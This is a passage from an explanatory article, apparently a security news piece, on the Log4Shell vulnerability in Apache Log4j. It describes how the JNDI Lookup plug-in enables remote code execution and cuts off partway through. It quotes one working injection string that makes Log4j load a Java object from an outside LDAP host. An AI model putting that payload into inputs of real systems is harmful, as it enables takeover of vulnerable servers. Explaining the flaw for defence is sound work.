The Apache Log4j vulnerability, now called Log4Shell, took security teams by surprise and the Internet by storm.
A seemingly innocuous logging tool has been used by hackers to take control of vulnerable applications. Apache has rated this vulnerability as "critical" and has published a patch in an attempt to contain the potential damage. Log4Shell has also received the top CVSS score of 10. This means that the vulnerability is a critical flaw in a piece of code used at the foundation of a vast number of Web applications and is considered extremely widespread and dangerous.
The exploit works by relying on the benign nature of logs. Logs are typically not used as attack vectors, which is why this attack took so many security organizations by surprise. In this case, the Log4Shell vulnerability is contained within a lookup plug-in, which provides a way for Java apps to retrieve objects stored in a DNS or LDAP directory. The plug-in allows the ability to do something more proactive than "just" log, and therein lies the key to the problem — and gives the attacker the ability to exploit a logging tool in order to hack an app.
The JNDI Lookup plug-in contains the Log4Shell vulnerability and, in general, the queries for the plug-in input should include just the object name. When a URL is inserted instead of the object name, however — e.g., ${jndi:ldap://website.com/rce} — Log4j will connect to the JNDI on the specified server and obtain the Java object. This enables remote code execution on the logging server.
The ubiquitous nature of this logging tool means that the exploit opportunities for hackers are endles ..
Support the originator by clicking the read the rest link below.
